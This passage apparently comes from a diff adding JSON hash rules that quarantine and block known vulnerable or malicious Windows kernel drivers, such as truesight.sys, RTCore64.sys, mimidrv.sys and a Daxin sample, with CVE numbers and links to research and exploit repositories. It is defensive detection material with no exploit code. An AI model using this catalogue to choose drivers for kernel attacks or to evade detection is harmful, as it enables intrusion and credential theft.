+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "758ec7c1-8ea9-5995-a603-90db92ea0309",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823713Z",
+ "creation_date": "2026-03-23T11:45:31.823715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5483d329abd393f8210f4c2ac1ac869d0460437a3f02d2b12bce5d79efb6094c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75902a3f-6097-5473-bf71-acad317b735e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617731Z",
+ "creation_date": "2026-03-23T11:45:29.617733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71dc8d678e0749599d3db144c93741f64def1b8b0efb98bef963d2215ebb4992",
+ "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "759199e1-0a20-5d1b-abd7-37733a1e1251",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823815Z",
+ "creation_date": "2026-03-23T11:45:31.823817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cec449ef0979ac93a7ef6800ee545eea4e06c7fde1e845b6e03a4d876ecbf78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7595d3f8-78b9-582c-91a1-1589b35bef58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973810Z",
+ "creation_date": "2026-03-23T11:45:29.973812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "818e396595d08d724666803cd29dac566dc7db23bf50e9919d04b33afa988c01",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75a4f09d-428c-5f4d-b71e-7b022902dc11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151782Z",
+ "creation_date": "2026-03-23T11:45:31.151785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91106ec1eca4aa843813fc2f938a6bd8a11479afd0994f84c4adf28e0ad628c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75af6210-5611-5f5d-8bc1-a25b1116707e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490644Z",
+ "creation_date": "2026-03-23T11:45:31.490646Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2076e52665e419bb4001119a08c5cee2cb8931e534b2fa92a01112866ec0bd5a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75b80154-0ed1-5d7e-8021-f594f6d9a19b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976228Z",
+ "creation_date": "2026-03-23T11:45:29.976230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976235Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75c26195-5de6-5df8-b9d0-984ae906647a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820065Z",
+ "creation_date": "2026-03-23T11:45:30.820067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f5243c9d9638a23ccf0e32f54c585e5688a4a853ff04898281fa23697aaec34",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75e09d81-e474-5593-818d-cd943503a42f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975325Z",
+ "creation_date": "2026-03-23T11:45:29.975327Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43b82200c2189aa63b332a62907f12fd5ad52fe275feca60fa9636555319518a",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75ed486c-f9d3-5ef8-819a-59d1c697ac4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483662Z",
+ "creation_date": "2026-03-23T11:45:31.483666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d1e83cb1056ee615c4f03456d55dfc95a76f8afc64116728edd5c44ca7017fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75f7bce2-29d7-5d6a-9fb2-c55b8969f627",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604090Z",
+ "creation_date": "2026-03-23T11:45:29.604092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f742d827a2e203a4c9d8fccb1daf2e85d451761fc9c0acb962dd6c447ef10ca",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75f872d7-7c98-5539-86a9-cadd39823d63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470990Z",
+ "creation_date": "2026-03-23T11:45:30.470993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "234664ae69df63d55c1477f3adc33ffdb130fc939c55c16e73e3339a133bcfa3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75f9d3a5-a896-5556-bff0-36bcdc84fcc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142939Z",
+ "creation_date": "2026-03-23T11:45:32.142941Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142947Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fa50ee8ed9d5c91d3375950613132497c44f468193bce9fe8e51c918a9498b5",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76015575-1679-5cbd-a935-eb28dc554abd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835375Z",
+ "creation_date": "2026-03-23T11:45:30.835378Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835388Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d86194d55186fa5f976da6cdc8758411d8e3d6a221417ac815aa3ba148e0d90",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76042022-c1f2-5fbc-8701-7d9c84598809",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982538Z",
+ "creation_date": "2026-03-23T11:45:29.982540Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae",
+ "comment": "Malicious Kernel Driver (aka daxin_blank1.sys) [https://www.loldrivers.io/drivers/1bf3b155-752a-4cc7-beb0-f202e525eb1a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "760a10b5-d13e-5837-8a1c-2b670477440c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983439Z",
+ "creation_date": "2026-03-23T11:45:29.983441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26",
+ "comment": "Vulnerable Kernel Driver (aka Blackbone.sys) [https://www.loldrivers.io/drivers/b9b835bd-b720-424b-9160-2442bc4d6e58/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76145b10-7db1-529f-8f28-c94951fae112",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979342Z",
+ "creation_date": "2026-03-23T11:45:29.979344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979349Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6994b32e3f3357f4a1d0abe81e8b62dd54e36b17816f2f1a80018584200a1b77",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7616a600-1824-5b3e-87f4-6c3e8b65dda9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816834Z",
+ "creation_date": "2026-03-23T11:45:31.816838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab47c98ad0fd5bd499a9b64e8697049658e4e7f4e3ac5573d6d776578749cc80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "761eae45-3d62-5d71-8891-f4ba44272805",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610388Z",
+ "creation_date": "2026-03-23T11:45:29.610390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610396Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49329fa09f584d1960b09c1b15df18c0bc1c4fdb90bf48b6b5703e872040b668",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "76344f3f-8ead-5fef-8bae-1f4d73eff66f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605576Z",
+ "creation_date": "2026-03-23T11:45:29.605578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37a165ae09645763189c2a973475d744bf3897f267dcca673b6b57477d9f8b38",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "764892de-3027-5ee3-95c4-4f1603a45696",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154501Z",
+ "creation_date": "2026-03-23T11:45:31.154503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154509Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7e0b9e529533471060e5cd0f9fbed341d18225a58a12c6c13c615ae062cb1e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "765e9e57-fd6e-5860-8839-d7751018ab24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460152Z",
+ "creation_date": "2026-03-23T11:45:30.460155Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460164Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96df0b01eeba3e6e50759d400df380db27f0d0e34812d0374d22ac1758230452",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "766256c7-dd82-57c9-beb8-0985e5a500b9",
+ "test_maturity_current_count": 0,
